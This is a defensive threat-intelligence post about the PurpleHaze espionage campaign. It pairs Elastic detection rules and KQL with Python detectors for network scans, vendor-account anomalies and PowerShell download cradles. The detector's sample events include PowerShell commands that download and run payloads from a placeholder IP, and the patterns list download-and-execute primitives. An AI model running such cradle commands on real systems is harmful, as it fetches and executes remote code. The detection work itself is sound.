China-Backed “PurpleHaze” Attacks on SentinelOne and the IT Supply Chain

Introduction

In June 2025, SentinelLabs (with coverage by Dark Reading) described a China-nexus espionage cluster it calls PurpleHaze, which it links to APT15 and UNC5174. The cluster targeted SentinelOne itself and an IT logistics provider that serves SentinelOne employees. The activity combined reconnaissance of SentinelOne's internet-facing infrastructure, an attempted supply chain intrusion at the logistics provider, and ShadowPad deployments at more than 70 organizations worldwide. Elastic Security can surface the same behaviors with prebuilt rules, custom rules and threat intelligence, as laid out below.

What Is the PurpleHaze Campaign, and Why Does It Matter?

PurpleHaze is the name SentinelLabs gave to a cluster of China-nexus activity that it links to APT15 and UNC5174. The observed activity, in order:

  • October 2024: Remote reconnaissance of SentinelOne's internet-facing infrastructure.
  • Early 2025: Attempted supply chain compromise, using ShadowPad, of a third-party company that handles hardware logistics for SentinelOne employees.
  • July 2024 to March 2025: The broader ShadowPad campaign against 70+ organizations across government, media, manufacturing and other sectors.

SentinelLabs confirmed that SentinelOne itself was not compromised, but the episode shows that cybersecurity vendors, and the companies that serve them, are deliberate and persistent targets.

Core Elastic Detection Rules

Elastic Security ships prebuilt rules and lets you author custom ones; together they cover the key phases of the PurpleHaze campaign: reconnaissance, third-party credential abuse, and malware staging. The rules below are the most relevant. Rules 1, 2 and 5 are prebuilt (their UUIDs and filenames come from the elastic/detection-rules repository); rules 3 and 4 are custom rules you write yourself.

1. Potential Network Sweep Detected

  • Rule ID: 781f8746-2180-4691-890c-4c96d11ca91d
  • Filename: discovery_potential_network_sweep_detected.toml
  • Description: Flags when a single source attempts connections to multiple internal hosts or ports, often indicative of scanning and enumeration behavior.
  • Link: Potential Network Sweep Detected

2. Potential SYN-Based Port Scan Detected

  • Rule ID: bbaa96b9-f36c-4898-ace2-581acb00a409
  • Filename: discovery_potential_syn_port_scan_detected.toml
  • Description: Detects port scanning via SYN packets, which may precede exploit attempts or service discovery across your perimeter.
  • Link: Potential SYN-Based Port Scan Detected
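To make the logic behind rules 1 and 2 concrete, here is an added example (not code from the original post, and not Elastic's rule implementation) that applies the same two heuristics to constructed, ECS-style flow records: one source reaching many distinct internal hosts inside a short window, or one source hitting many distinct ports on a single host. The window length, the thresholds and every sample record are assumptions chosen for illustration.

```python
"""Sliding-window detector for the two reconnaissance patterns above.

Added example: this is not code from the original post, nor Elastic's rule
logic. It reproduces the idea behind "Potential Network Sweep Detected"
(one source, many internal hosts) and "Potential SYN-Based Port Scan
Detected" (one source, many ports on one host) over constructed,
ECS-style flow records. Window, thresholds and sample data are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=5)   # assumed correlation window
HOST_SWEEP_THRESHOLD = 10       # assumed: distinct destination hosts per source
PORT_SCAN_THRESHOLD = 20        # assumed: distinct ports on one host per source


def _ts(value):
    """Parse the ISO-8601 Zulu timestamps used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _flow(ts, src, dst, port):
    """Build one constructed, ECS-style connection-attempt record."""
    return {"@timestamp": ts, "source.ip": src, "destination.ip": dst,
            "destination.port": port, "network.transport": "tcp",
            "event.action": "connection_attempted"}


# Constructed sample telemetry (not real logs).
SAMPLE_FLOWS = (
    # a sweep: one external source touches twelve internal hosts on 443 in 12 s
    [_flow(f"2024-10-15T09:00:{i:02d}Z", "203.0.113.7", f"10.1.0.{i}", 443)
     for i in range(1, 13)]
    # a SYN-style port scan: one source, one host, 25 ports in 25 s
    + [_flow(f"2024-10-15T09:10:{i:02d}Z", "198.51.100.9", "10.2.0.5", 20 + i)
       for i in range(25)]
    # benign: a monitoring box polling three hosts
    + [_flow(f"2024-10-15T09:3{i}:00Z", "10.0.0.2", f"10.1.0.{i}", 443)
       for i in range(3)]
    # a slow sweep: twelve hosts, one every ten minutes, never ten in one window
    + [_flow(f"2024-10-15T{10 + i // 6:02d}:{(i % 6) * 10:02d}:00Z", "192.0.2.50",
             f"10.3.0.{i}", 22) for i in range(12)]
)


def detect_scans(flows, window=WINDOW, host_threshold=HOST_SWEEP_THRESHOLD,
                 port_threshold=PORT_SCAN_THRESHOLD):
    """Return one alert per (source, kind, target) whose distinct-host or
    distinct-port count crosses its threshold within any window-long span.
    `count` is the highest count observed for that alert."""
    by_source = defaultdict(list)
    for flow in sorted(flows, key=lambda f: f["@timestamp"]):
        by_source[flow["source.ip"]].append(flow)

    alerts = {}
    for src, events in by_source.items():
        recent = deque()                      # events inside the current window
        for ev in events:
            now = _ts(ev["@timestamp"])
            recent.append(ev)
            while _ts(recent[0]["@timestamp"]) < now - window:
                recent.popleft()
            ports_by_host = defaultdict(set)
            for r in recent:
                ports_by_host[r["destination.ip"]].add(r["destination.port"])
            if len(ports_by_host) >= host_threshold:
                key = (src, "network_sweep", "")
                alerts[key] = max(alerts.get(key, 0), len(ports_by_host))
            for host, ports in ports_by_host.items():
                if len(ports) >= port_threshold:
                    key = (src, "port_scan", host)
                    alerts[key] = max(alerts.get(key, 0), len(ports))
    return [{"source.ip": s, "kind": k, "target": t, "count": c}
            for (s, k, t), c in sorted(alerts.items())]


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_FLOWS):
        print(alert)
```

The slow-sweep source is the point of the sliding window: it touches as many hosts as the real sweep but never ten inside five minutes, so a window-based rule stays quiet while a simple per-day count would fire. Tune the window and thresholds to your own baseline before enabling anything like this in production.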

3. Suspicious Vendor or Partner Account Anomaly (custom rule)

  • Rule ID: vendor_access_behavior_anomaly (placeholder for a custom rule; this is not an Elastic prebuilt rule ID)
  • Filename: detection_vendor_behavior_deviation.toml (placeholder)
  • Description: Flags deviations for known third-party and vendor accounts, such as logins from outside the address ranges agreed with the vendor, activity outside agreed hours, or operations the vendor has no business performing. This is the signal that catches a supply chain pivot through a partner's credentials.
  • Example KQL (value lists in KQL use `or`; `source.ip : *` keeps documents that lack the field out of the match; the two CIDRs are placeholders for the ranges agreed with each vendor):
event.dataset : "o365.audit" AND
user.name : ("vendor1@yourdomain.com" or "logistics-partner@yourdomain.com") AND
source.ip : * AND
NOT source.ip : ("198.51.100.0/24" or "203.0.113.64/27")
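The KQL above only covers the address check. As an added example (not code from the original post and not an Elastic rule), the following applies all three checks the custom rule needs, address range, working hours and permitted operations, to constructed o365.audit-style events. The vendor accounts, their agreed ranges and hours, the list of forbidden operations and every sample event are assumptions invented for illustration.

```python
"""Vendor-account anomaly check over constructed o365.audit-style events.

Added example, not code from the original post and not an Elastic rule.
It shows what the custom rule described above has to decide: does a known
third-party account log in from outside its agreed ranges, outside its
agreed hours, or perform an operation it should never perform? Accounts,
ranges, hours, forbidden operations and the events are all assumptions.
"""
import ipaddress
from datetime import datetime

# Assumed access agreement per vendor account (hypothetical values).
_FORBIDDEN = {"Add member to role.", "Set-Mailbox", "New-InboxRule"}
VENDOR_POLICY = {
    "logistics-partner@yourdomain.com": {
        "allowed_cidrs": ["198.51.100.0/24"],
        "hours_utc": (7, 19),
        "forbidden_actions": _FORBIDDEN,
    },
    "vendor1@yourdomain.com": {
        "allowed_cidrs": ["203.0.113.64/27", "2001:db8:1::/48"],
        "hours_utc": (6, 20),
        "forbidden_actions": _FORBIDDEN,
    },
}


def evaluate(event, policy=VENDOR_POLICY):
    """Return the list of policy deviations for one event (empty = clean)."""
    user = event.get("user.name")
    if event.get("event.dataset") != "o365.audit" or user not in policy:
        return []                       # not a vendor account we track
    rules = policy[user]
    reasons = []

    src = ipaddress.ip_address(event["source.ip"])
    if not any(src in ipaddress.ip_network(c) for c in rules["allowed_cidrs"]):
        reasons.append(f"source {src} outside agreed ranges")

    hour = datetime.strptime(event["@timestamp"], "%Y-%m-%dT%H:%M:%SZ").hour
    start, end = rules["hours_utc"]
    if not start <= hour < end:
        reasons.append(f"activity at {hour:02d}:xx UTC outside {start:02d}-{end:02d}")

    if event.get("event.action") in rules["forbidden_actions"]:
        reasons.append(f"operation {event['event.action']!r} not permitted for vendor")
    return reasons


def scan(events, policy=VENDOR_POLICY):
    """Return (user, timestamp, reasons) for every event with a deviation."""
    findings = []
    for ev in events:
        reasons = evaluate(ev, policy)
        if reasons:
            findings.append((ev["user.name"], ev["@timestamp"], reasons))
    return findings


def _ev(ts, user, ip, action="UserLoggedIn"):
    """Build one constructed o365.audit-style record."""
    return {"@timestamp": ts, "event.dataset": "o365.audit", "user.name": user,
            "source.ip": ip, "event.action": action, "event.outcome": "success"}


# Constructed sample events (not real audit data).
SAMPLE_EVENTS = [
    _ev("2025-02-03T10:02:11Z", "logistics-partner@yourdomain.com", "198.51.100.23"),  # clean
    _ev("2025-02-03T10:05:40Z", "logistics-partner@yourdomain.com", "203.0.113.77"),   # wrong range
    _ev("2025-02-04T02:31:05Z", "vendor1@yourdomain.com", "203.0.113.70"),             # off hours
    _ev("2025-02-04T11:12:00Z", "logistics-partner@yourdomain.com", "198.51.100.40",
        action="Add member to role."),                                                # privilege change
    _ev("2025-02-04T11:15:00Z", "alice@yourdomain.com", "203.0.113.77"),             # employee: ignored
    _ev("2025-02-05T00:10:00Z", "vendor1@yourdomain.com", "192.0.2.9",
        action="New-InboxRule"),                                                      # all three at once
]

if __name__ == "__main__":
    for user, ts, reasons in scan(SAMPLE_EVENTS):
        print(user, ts, "; ".join(reasons))
```

The three checks are deliberately independent so that a single finding carries every reason at once; an analyst triaging a vendor login at midnight from an unknown range that also creates an inbox rule should see all three in one alert rather than three separate ones.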

4. ShadowPad Execution and C2 Callback (custom rule)

  • Rule ID: shadowpad_initial_execution_c2 (placeholder for a custom rule; Elastic ships no single prebuilt rule under this name)
  • Filename: detection_shadowpad_c2_traffic_and_execution.toml (placeholder)
  • Description: ShadowPad is typically delivered by DLL sideloading: a legitimate, signed executable is dropped next to a malicious DLL that it loads, and the DLL then decrypts the payload and calls out to C2. Build this detection from two parts: Elastic's prebuilt DLL side-loading rules (a signed binary loading an unsigned DLL from a user-writable directory), plus an indicator-match rule fed with ShadowPad C2 infrastructure from your threat-intelligence source. Do not rely on a single string match for the malware name.
  • Link: search the elastic/detection-rules repository on GitHub for "side-loading" to find the prebuilt rules to build on.

5. PowerShell-Based Malware Delivery

  • Rule ID: 7d3cfcd7-d4b1-41dc-a7e3-fad60ef52e87
  • Filename: execution_potential_powershell_hacktool_script_by_author.toml
  • Description: Matches PowerShell script blocks that contain the names of well-known authors of offensive PowerShell tooling, which is a reliable signal for the frameworks used to stage and load payloads. It does not look for Invoke-WebRequest or encoded commands; download-and-execute chains need a separate custom rule such as the example query further down.
  • Link: View Rule

How to Create Custom Rules

  • Correlate patterns in network reconnaissance across environments (e.g., repeated port 443 probes to external-facing endpoints).
  • Flag anomalous use of third-party credentials accessing internal APIs or asset platforms.
  • Watch for PowerShell-based download-and-execute chains pointing to ShadowPad’s staging domains.

Example KQL Query

Two things to get right here. First, a process event carries no network.direction, so a query that ANDs process fields with network fields never matches; correlate the later outbound connection separately (for example with an EQL sequence joined on process.entity_id). Second, the malware name never appears on the command line, so match the download-and-execute primitives instead (wildcards must be unquoted in KQL):

event.category : "process" AND event.type : "start" AND
process.name : ("powershell.exe" or "pwsh.exe") AND
process.args : (*Invoke-WebRequest* or *DownloadString* or *DownloadFile* or *Invoke-Expression* or *FromBase64String*)
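A wildcard on process.args sees only the literal command line, so a stager passed through -EncodedCommand slips past every pattern in the query above. The following added example (not code from the original post, and not an Elastic rule) shows the missing step: decode the base64/UTF-16LE payload first, then look for the cradle primitives in both the visible and the decoded text. The process records, the sample payloads and the indicator list are constructed for illustration.

```python
"""Download-and-execute detection over constructed process events.

Added example; not code from the original post, and not an Elastic rule.
A KQL wildcard on process.args sees only the literal command line, so a
stager passed through -EncodedCommand slips past "*Invoke-WebRequest*".
This decodes the base64/UTF-16LE payload first and then looks for the
usual cradle primitives in both the visible and the decoded text. The
event records, sample payloads and indicator list are assumptions.
"""
import base64
import re

# Primitives that typically appear in a PowerShell download cradle (assumed list).
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile"
    r"|Net\.WebClient|Invoke-Expression|\biex\b|Start-BitsTransfer|FromBase64String",
    re.IGNORECASE,
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENC_RE = re.compile(rf"[-/](?:{_ENC_FLAG})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return a finding for a PowerShell process whose command line (visible
    or decoded) contains download-and-execute indicators, else None."""
    if event.get("process.name", "").lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("process.command_line", "")
    decoded = decode_encoded_command(cmd)
    text = ENC_RE.sub(" ", cmd)            # drop the base64 blob itself
    if decoded:
        text += "\n" + decoded
    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(text)})
    if not hits:
        return None
    return {"host.name": event.get("host.name"), "indicators": hits,
            "encoded": decoded is not None, "decoded": decoded}


def scan(events):
    """Return the findings for every event that classify() flags."""
    return [f for f in (classify(e) for e in events) if f]


def _encode(script):
    """Build an -EncodedCommand argument the way a stager would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    {"host.name": "WS01", "process.name": "powershell.exe",
     "process.command_line": 'powershell.exe -nop -w hidden -c "IEX (New-Object '
                             "Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')\""},
    {"host.name": "WS02", "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -NoProfile -EncodedCommand " + _encode(
         "Invoke-WebRequest -Uri http://203.0.113.10/p.dll -OutFile $env:TEMP\\p.dll")},
    {"host.name": "WS03", "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host.name": "WS04", "process.name": "pwsh.exe",
     "process.command_line": "pwsh.exe -enc " + _encode("Get-Date")},
    {"host.name": "WS05", "process.name": "cmd.exe",
     "process.command_line": "cmd.exe /c echo Invoke-WebRequest"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only WS01 and WS02 are flagged: the plain cradle and the encoded one. WS04 also uses -enc, but its decoded script is harmless, which is why the decision should rest on the decoded content rather than on the presence of the flag alone.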

Response and Hardening Tips

  • Segment and monitor third-party access zones, especially for logistics or hardware environments.
  • Proactively hunt on PowerShell execution chains linked to ShadowPad or reconnaissance payloads.
  • Validate no unexpected exposures exist on internet-facing assets.
  • Engage with vendors on supply chain hardening: enforce MFA, grant just-in-time access instead of standing access, and require mutual TLS or certificate-bound credentials for any API integration they hold.

MITRE ATT&CK Framework Mapping

  • T1595 Active Scanning: the October 2024 reconnaissance of internet-facing assets.
  • T1195 Supply Chain Compromise (T1195.003, Compromise Hardware Supply Chain) and T1199 Trusted Relationship: the intrusion attempt through the hardware logistics provider.
  • T1574.002 Hijack Execution Flow: DLL Side-Loading: the usual way ShadowPad gets loaded.
  • T1105 Ingress Tool Transfer: staging ShadowPad and supporting tooling.
  • T1059.001 Command and Scripting Interpreter: PowerShell, for download-and-execute stages.

Why Should We Care?

The PurpleHaze campaign highlights that cybersecurity vendors—and their broader ecosystem—are now strategic targets.

  • China‑backed APT15 and UNC5174 employ reconnaissance and supply chain abuse to position for espionage.
  • Compromising vendors or logistics providers offers adversaries visibility into defense architectures and potential pivot points.
  • Tooling such as ShadowPad, operated through ORB (operational relay box) networks that hide the operators' origin, stays in play even when the primary intrusion attempt is blocked.

Bottom line: detection of reconnaissance, third-party access misuse and post-compromise scripting belongs at the top of your Elastic telemetry priorities, especially now that defenders themselves are primary targets.
